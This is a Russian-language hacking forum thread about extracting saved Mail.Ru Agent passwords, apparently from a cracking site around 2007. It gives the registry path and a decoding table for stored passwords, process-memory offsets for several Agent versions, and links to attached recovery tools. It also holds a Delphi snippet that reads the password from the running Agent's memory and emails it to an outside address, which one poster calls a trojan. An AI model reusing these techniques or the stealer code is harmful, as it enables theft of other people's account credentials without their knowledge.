Покопался тут в реестре ,нашёл где хранятся пароли.

Создаю нового пользователя abc@mail.ru,пароль устанавливаю 12345
в реестре смотрю HKEY_CURRENT_USER / Software / Mail.Ru / Agent /mra_logins.
Смотрю двоичный параметр abc@mail.ru , значение 05 00 00 00 9b 98 99 9e 9f.
05-это длина пароля,потом 00 00 00 (вводил различные пароли всёравно было 00 00 00),
дальше идёт сам пароль(не в открытом виде конечно) 9b 98 99 9e 9f.
Так вот мне интересно у всех ли пароли кодируются подобным образом,приведу некоторые
значения :
цифры: буквы:

0 -9a A -eb
1 -9b B -e8
2 -98 C -e9
3 -99 D -ee
4 -9e E -ef
5 -9f F -ec
6 -9c
7 -9d
8 -92
9 -93

Если кодировка одинаковая то можно сделать программу ,которая будет читать
пароли к мылу из реестра и показывать её уже в нормальном виде.

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

MACKLIA пишет:
как dial-up пароли выдернуть ?

Как выдернуть dial-up пароли доступно тут:
www.cobans.net/ras.php

| Сообщение посчитали полезным:

Demon Ada пишет:
MACKLIA пишет:
как dial-up пароли выдернуть ?

Как выдернуть dial-up пароли доступно тут:
www.cobans.net/ras.php

hahahaha Paroli ne ETI ot dialup , a te sto v mail agente dla svonkov s interneta!!!

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

mak пишет:
hahahaha Paroli ne ETI ot dialup , a te sto v mail agente dla svonkov s interneta!!!

Demon Ada спасибо эти тоже пригодятся

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

а накой оно вам?

| Сообщение посчитали полезным:

Я вот тут тоже что то написал (кодер я только начинающий:s12.
Только это что то не работает почему то... Может кто поможет из опытных...
uses
Windows, Messages, smtpsend, classes, SysUtils, IdGlobal;

var
Bytesread : DWORD;
Olddata : array[0..16] of char;
send: TStringList;
pass: string;
i: integer;
SeDebugNameValue:Int64;
tkp:TOKEN_PRIVILEGES;
ReturnLength:Cardinal;
hToken ,hProcess,handle :THandle;



begin
if not OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES
or TOKEN_QUERY, hToken ) then
exit;
if not LookupPrivilegeValue( nil, 'SeDebugPrivilege', SeDebugNameValue )
then begin
CloseHandle(hToken);
exit;
end;
tkp.PrivilegeCount:= 1;
tkp.Privileges[0].Luid := SeDebugNameValue;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,false,tkp,SizeOf(tkp),tkp,ReturnLength);
if GetLastError() <> ERROR_SUCCESS then exit;

hProcess:=OpenProcess(PROCESS_VM_OPERATION or
PROCESS_VM_READ,false, dword(StrToCard('Magent.exe')));

begin
ReadProcessMemory(hProcess,Pointer($647445),@olddata,16,bytesread);
end;

for i:=1 to 16 do begin

pass:=pass+olddata[i];
end;

send:= TStringList.Create;
send.Insert(0, pass);
smtpsend.SendToEx('xxxx@mail.ru', 'xxxxxx@gmail.com', 'subj', 'smtp.mail.ru', send, 'login', 'pass');



end.

| Сообщение посчитали полезным:

_baz88ka
Троя пишешь?
Нехорошо.

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

v0id2k пишет:
_baz88ka
Троя пишешь?
Нехорошо.

Если в учебных целях то нормально,ибо написание хороших троев мозги развивает
P.S. хотя на cracklab'e это неприветствуется.

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

4.9 агент вышел. Пароль теперь подругому шифруется, но в памяти он виден . И история шифруется подругому:
{\rtf1\ansi\ansicpg1251\deff0\deflang1049{\fonttbl{\f0\fnil\fcharset20 4 Georgia;}}
{\colortbl ;\red255\green0\blue0;}
\viewkind4\uc1\pard\cf1\b\i\f0\fs27'e4'e0'e9 'f4'ee'f2'ee 'f2'e2'ee'e8'f5 'e1'eb'e8'e7'ed'e5'f6'ee'e2?\par
}

Будто RTF

| Сообщение посчитали полезным:

Так и есть теперь они RTF кодируются..

| Сообщение посчитали полезным:

Da ug =)))) pishem dopolnenie snachit ))))))))))) kto na Delphi uge pisat nachal ?

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

_baz88ka пишет:
4.9 агент вышел. Пароль теперь подругому шифруется
Вечером качнуть надо,посмотреть.

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

_baz88ka пишет:
история шифруется подругому:
{\rtf1\ansi\ansicpg1251\deff0\deflang1049{\fonttbl{\f0\fnil\fcharset20 4 Georgia;}}
{\colortbl ;\red255\green0\blue0;}
\viewkind4\uc1\pard\cf1\b\i\f0\fs27'e4'e0'e9 'f4'ee'f2'ee 'f2'e2'ee'e8'f5 'e1'eb'e8'e7'ed'e5'f6'ee'e2?\par
}
Будто RTF
Так и есть теперь они RTF кодируются..

http://ru.wikipedia.org/wiki/Rtf http://ru.wikipedia.org/wiki/Rtf

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

makВыложи пожалуйста искодники твоей программы. Очень нада.

| Сообщение посчитали полезным:

А для чего остальные байты от ID служат?
И где можно установленную версию MAgent считать?

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

>И где можно установленную версию MAgent считать?
по наличию / отсутствию опред. ключей реестра?

| Сообщение посчитали полезным:

brok пишет:
makВыложи пожалуйста искодники твоей программы. Очень нада. a

ok , tolko savtra ..shas net pod rukami !

Savtra vilogu kod ...pomogite ego rasobrat stob bistree ...dla novogo Ma

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

А можно процесс в памяти искать не по имени?
А то переименовал exe и грош-цена всем этим прогам

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

Смещения при разной сборке тоже различаются...
'4.4.1348', $1E3034
'4.5.1399', $1F7C90
'4.6.1425', $204C28
'4.7.1670', $2433E0
'4.8.1705', $246400
'4.8.1709', $247430
'4.9.1863', $237B34
что есть... может кому надо

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

Поддерживает все эти версии: [Delphi: 211Kb]

fe63_05.06.2007_CRACKLAB.rU.tgz - MAgent Pass.exe

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

Isaev, работает только при запущенном агенте... Зато всё верно +1

| Сообщение посчитали полезным:

Bitfry пишет:
Руки бы вырывать за такие алгоритмы.

Видать расстроился чел... Что-то придумал... Только сомневаюсь, что умнее
Кто разбирался как в 4.9 пасс шифруется в реестре?

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

WolfHunter пишет:
про то как вычисляется magic_byte пожалуй помолчу
А как он вычисляется?

У меня не одна из версий его туда (в "Software\Mail.Ru\Agent" [ID]) не пишет и нормально работает (только без него пасс в реестре в открытом виде)
(все версии без инсталлятора) может его инсталлятор прописывает...
А 4.9 ID вообще не пользует

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

Isaev пишет:
А 4.9 ID вообще не пользует

Да начиная с 4,9 ID вообще нет,пароли шифруются както по другому - кто знаит как отзовись

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

MACKLIA пишет:
кто знаит как отзовись
Ну для начала нужно полюбому тянуть эти 2 таблицы (см. аттач)

Потом читается файл C:\Documents and Settings\--UserName--\Application Data\Mra\Update\ver.txt (это типа MagicID) [кто прочитает при запущеном агенте +1]
нехитро накладывается на эти 2 таблицы... А дальше всё просто...

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

файлы не прикрепляются при правке сообщения

60ca_08.06.2007_CRACKLAB.rU.tgz - Table.exe

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

А вот собственно и ОН
Но работает только при выключеном агенте...
Помогите обойти блокировку файла.

57cb_09.06.2007_CRACKLAB.rU.tgz - Pass49.exe

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

brok пишет:
makВыложи пожалуйста искодники твоей программы. Очень нада.
Vot =) , tolko tam nemnogo lischnego est , no rasberesa sto k chemu =)))

Isaev пишет:
А вот собственно и ОН
Но работает только при выключеном агенте...
Помогите обойти блокировку файла.

57cb_09.06.2007_CRACKLAB.rU.tgz - Pass49.exe
Kod v studiu PLEASE =))))))))))))

6df8_10.06.2007_CRACKLAB.rU.tgz - MailAgent.rar

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

Или аффтар ламер или я начинаю в асме разбираться...

mak пишет:
Kod v studiu PLEASE =))))))))))))
ногами не бить, если кто оптимизмрует скиньте, буду учиться

c9ba_10.06.2007_CRACKLAB.rU.tgz - Pass49.rar

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

Isaev пишет:
Или аффтар ламер или я начинаю в асме разбираться...
Stranno =)) skolko sigu na forumah , obasatelno nado obosrat!!! A novechkam voobse sopa! Ne pomogaut a obseraut ili v google posilut ili ese kuda ))))) Eh tovarish !!!

Nu to sto nachal rasbiratsa eto konechno ! =)) A dla teba ya budu PROSTO Lamer !

Narusaa tradisii Skasu tebe SPASIBO !

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

mak, nu ty daesch!!! Da ja ne pro tebja a pro afftara agenta
(S chego by ja wdrug nachal tebja obsirat'??? Ty chto powod dawal???)
Dazhe obidno, chto obo mne tak podumali
Swoih uwazhaem i dawaj fludit' w lichke

Sorry za flud

Прям расстроил ты меня... пойду пивка попью...

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным: